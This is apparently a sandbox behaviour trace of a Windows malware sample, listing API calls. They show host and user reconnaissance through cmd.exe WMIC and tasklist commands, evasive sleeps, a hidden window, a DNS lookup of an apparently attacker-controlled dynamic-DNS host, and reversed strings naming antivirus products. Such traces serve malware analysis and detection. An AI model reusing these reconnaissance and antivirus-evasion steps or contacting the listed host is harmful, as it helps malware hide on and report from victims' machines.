[0550.728] SHGetFolderPathW (in: hwnd=0x0, csidl=103, hToken=0x0, dwFlags=0x0, pszPath=0x16e046 | out: pszPath="") returned 0x80070057
[0550.728] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x16e046 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0
[0550.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48
[0550.739] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cchWideChar=48, lpMultiByteStr=0x1e7da80, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", lpUsedDefaultChar=0x0) returned 48
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0", cbMultiByte=48, lpWideCharStr=0x16cf60, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0") returned 48
[0550.739] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\JDownloader 2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\jdownloader 2.0"), lpFindFileData=0x16dff0 | out: lpFindFileData=0x16dff0*(dwFileAttributes=0x386a70, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x386a70, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x16e046, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x16e588, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task酀8") returned 4
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="task酀8") returned 4
[0550.739] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x16cf20, cchWideChar=2047 | out: lpWideCharStr="1136.dat") returned 8
[0550.740] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x16dfb0 | out: lpFindFileData=0x16dfb0*(dwFileAttributes=0xbe587109, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2c0917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x16e820, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xbe587109, nFileSizeHigh=0x0, nFileSizeLow=0x386a70, dwReserved0=0x0, dwReserved1=0x2cda8c, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0550.740] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x2e7328 | out: lpWSAData=0x2e7328) returned 0
[0550.752] gethostname (in: name=0x16e1eb, namelen=100 | out: name="Q9iATrkPrH") returned 0
[0550.786] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Q9iATrkPrH", cbMultiByte=10, lpWideCharStr=0x16d130, cchWideChar=2047 | out: lpWideCharStr="Q9iATrkPrH") returned 10
[0550.786] WSACleanup () returned 0
[0550.803] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x2d7720, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x16e24c | out: lpThreadId=0x16e24c*=0x714) returned 0xd0
[0550.805] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="task", cbMultiByte=4, lpWideCharStr=0x16d1c0, cchWideChar=2047 | out: lpWideCharStr="taskp\x16") returned 4
[0550.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0550.805] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x1e8c1f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 8
[0550.805] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0550.805] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0550.805] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="msprotB7", cbMultiByte=8, lpWideCharStr=0x16d170, cchWideChar=2047 | out: lpWideCharStr="msprotB7") returned 8
[0550.805] RegisterClassW (lpWndClass=0x16e208) returned 0xc104
[0550.805] CreateWindowExW (dwExStyle=0x10000, lpClassName="msprotB7", lpWindowName="", dwStyle=0x80, X=1, Y=1, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2b0000, lpParam=0x0) returned 0x30110
[0550.809] NtdllDefWindowProc_W () returned 0x0
[0550.809] NtdllDefWindowProc_W () returned 0x1
[0550.813] NtdllDefWindowProc_W () returned 0x0
[0550.818] GetMessageW (lpMsg=0x16e590, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0)
[0596.784] NtdllDefWindowProc_W () returned 0x1
[0625.446] NtdllDefWindowProc_W () returned 0x1
Thread:
id = 225
os_tid = 0x6dc
Thread:
id = 226
os_tid = 0x714
[0550.818] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0550.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0550.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cchWideChar=43, lpMultiByteStr=0x1e7dad0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", lpUsedDefaultChar=0x0) returned 43
[0550.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat", cbMultiByte=43, lpWideCharStr=0x227e810, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat") returned 43
[0550.818] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\11.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\11.dat"), lpFindFileData=0x227f8a0 | out: lpFindFileData=0x227f8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x227f8c0, dwReserved0=0x0, dwReserved1=0x227f8e8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0550.819] Sleep (dwMilliseconds=0x2bf20)
[0560.843] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0561.511] Sleep (dwMilliseconds=0x2710)
[0571.529] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0571.530] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpDirectory=0x0, nShowCmd=0) returned 0x2a
[0571.613] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7feff320000
[0571.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0571.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetUserNameW", cchWideChar=12, lpMultiByteStr=0x1e8c250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetUserNameW", lpUsedDefaultChar=0x0) returned 12
[0571.614] GetProcAddress (hModule=0x7feff320000, lpProcName="GetUserNameW") returned 0x7feff331fd0
[0571.614] GetUserNameW (in: lpBuffer=0x227f9f6, pcbBuffer=0x227f9f0 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x227f9f0) returned 1
[0571.616] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227f8f6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0571.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0571.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cchWideChar=43, lpMultiByteStr=0x1e7db20, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", lpUsedDefaultChar=0x0) returned 43
[0571.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat", cbMultiByte=43, lpWideCharStr=0x227e810, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat") returned 43
[0571.616] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\23.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\23.bat"), lpFindFileData=0x227f8a0 | out: lpFindFileData=0x227f8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2c36fd, nFileSizeHigh=0x0, nFileSizeLow=0x227f8c0, dwReserved0=0x0, dwReserved1=0x227f8e8, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.618] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x227e7d0, cchWideChar=2047 | out: lpWideCharStr="1136.datȧ") returned 8
[0571.618] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x227f860 | out: lpFindFileData=0x227f860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x2c0917, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x227f8c0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x2ba872, nFileSizeHigh=0x25, nFileSizeLow=0x227f890, dwReserved0=0x0, dwReserved1=0x2c367a, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.618] Sleep (dwMilliseconds=0xbb8)
[0571.641] Sleep (dwMilliseconds=0x0)
[0571.681] Sleep (dwMilliseconds=0xbb8)
[0571.822] Sleep (dwMilliseconds=0x0)
[0571.852] Sleep (dwMilliseconds=0xbb8)
[0571.878] Sleep (dwMilliseconds=0x1f40)
[0571.910] Sleep (dwMilliseconds=0xbb8)
[0571.918] Sleep (dwMilliseconds=0x7d0)
[0571.934] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="c:\\act\\13.dat", cbMultiByte=13, lpWideCharStr=0x227e6e0, cchWideChar=2047 | out: lpWideCharStr="c:\\act\\13.dat+") returned 13
[0571.934] FindFirstFileW (in: lpFileName="c:\\act\\13.dat" (normalized: "c:\\act\\13.dat"), lpFindFileData=0x227f770 | out: lpFindFileData=0x227f770*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x4a0048, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x3a1540, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x396e00, dwReserved0=0x0, dwReserved1=0x25, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0571.935] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f820 | out: lpWSAData=0x227f820) returned 0
[0571.944] gethostbyname (name="asper1.freeddns.org") returned 0x1d06f60*(h_name="asper1.freeddns.org", h_aliases=0x1d06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1d06f88*=([0]="186.48.86.162"))
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="186", cbMultiByte=3, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="186") returned 3
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="486", cbMultiByte=2, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="486") returned 2
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="866", cbMultiByte=2, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="866") returned 2
[0572.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="162", cbMultiByte=3, lpWideCharStr=0x227e530, cchWideChar=2047 | out: lpWideCharStr="162") returned 3
[0572.174] WSACleanup () returned 0
[0572.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0572.200] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1e8c280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0572.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x227e6a0, cchWideChar=2047 | out: lpWideCharStr="1136.dat\x02") returned 8
[0572.200] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x227f730 | out: lpFindFileData=0x227f730*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1cf5590, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0xfb050000, ftLastWriteTime.dwLowDateTime=0x7fe, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x227f7f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0572.201] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77a10000
[0572.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0572.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x1e8c2b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastInputInfo", lpUsedDefaultChar=0x0) returned 16
[0572.201] GetProcAddress (hModule=0x77a10000, lpProcName="GetLastInputInfo") returned 0x77a262f4
[0572.201] GetLastInputInfo (in: plii=0x227f35c | out: plii=0x227f35c*(cbSize=0x8, dwTime=0x2075f)) returned 1
[0572.201] GetTickCount () returned 0x56362
[0572.201] FreeLibrary (hLibModule=0x77a10000) returned 1
[0572.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="0©w", cbMultiByte=1, lpWideCharStr=0x227e0e0, cchWideChar=2047 | out: lpWideCharStr="0Ƚ") returned 1
[0572.201] GetSystemPowerStatus (in: lpSystemPowerStatus=0x227f364 | out: lpSystemPowerStatus=0x227f364) returned 1
[0572.202] QueryPerformanceCounter (in: lpPerformanceCount=0x227f368 | out: lpPerformanceCount=0x227f368*=2115724159388) returned 1
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="00", cbMultiByte=2, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="00") returned 2
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="XX", cbMultiByte=2, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="XX") returned 2
[0572.202] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44
[0572.202] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x1e7db70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpUsedDefaultChar=0x0) returned 44
[0572.202] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cbMultiByte=44, lpWideCharStr=0x227da50, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078") returned 44
[0572.202] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), lpFindFileData=0x227eae0 | out: lpFindFileData=0x227eae0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62dcea0, ftCreationTime.dwHighDateTime=0x1dab599, ftLastAccessTime.dwLowDateTime=0x62dcea0, ftLastAccessTime.dwHighDateTime=0x1dab599, ftLastWriteTime.dwLowDateTime=0x6bf32eb0, ftLastWriteTime.dwHighDateTime=0x1dab599, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x227eb28, cFileName="~dr9078", cAlternateFileName="")) returned 0x3a3080
[0572.202] FindClose (in: hFindFile=0x3a3080 | out: hFindFile=0x3a3080) returned 1
[0572.202] Sleep (dwMilliseconds=0x3e8)
[0572.216] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.216] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff
[0572.217] GetLastError () returned 0x20
[0572.217] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x3be460
[0572.217] SleepEx (dwMilliseconds=0x64, bAlertable=1) returned 0x0
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yksrepsak", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yksrepsak;\x7f") returned 9
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nrkek", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nrkek;\x7f") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="retsohsfk", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="retsohsfk;\x7f") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namyshsfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="namyshsfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="notronsfk", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="notronsfk;\x7f") returned 6
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tsavansfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tsavansfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="arivansfk", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="arivansfk;\x7f") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draugva", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.draugva") returned 11
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=" rivitnagva", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr=" rivitnagva") returned 8
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsgvaa", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsgvaa") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="iugvavsgvaa", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="iugvavsgvaa") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eefacmsgvaa", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="eefacmsgvaa") returned 6
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartpva", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartpva") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="dnertartpva", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="dnertartpva") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="setaicossa krowten", cbMultiByte=18, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="setaicossa krowten") returned 18
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.pvassa krowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.pvassa krowten") returned 7
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="adnapvassa krowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="adnapvassa krowten") returned 5
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.xsrgva krowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.xsrgva krowten") returned 10
[0572.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsdwgvava krowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="cvsdwgvava krowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugeva krowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iugeva krowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartmabsrowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartmabsrowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssniwabsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.ssniwabsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssdbwabsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.ssdbwabsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.tnegadbsrowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.tnegadbsrowten") returned 11
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.walccdbsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.walccdbsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomladbsrowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nomladbsrowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sohposmladbsrowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="sohposmladbsrowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.23mssfbsrowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.23mssfbsrowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomtnccprowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nomtnccprowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="atad gmtnccprowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="atad gmtnccprowten") returned 6
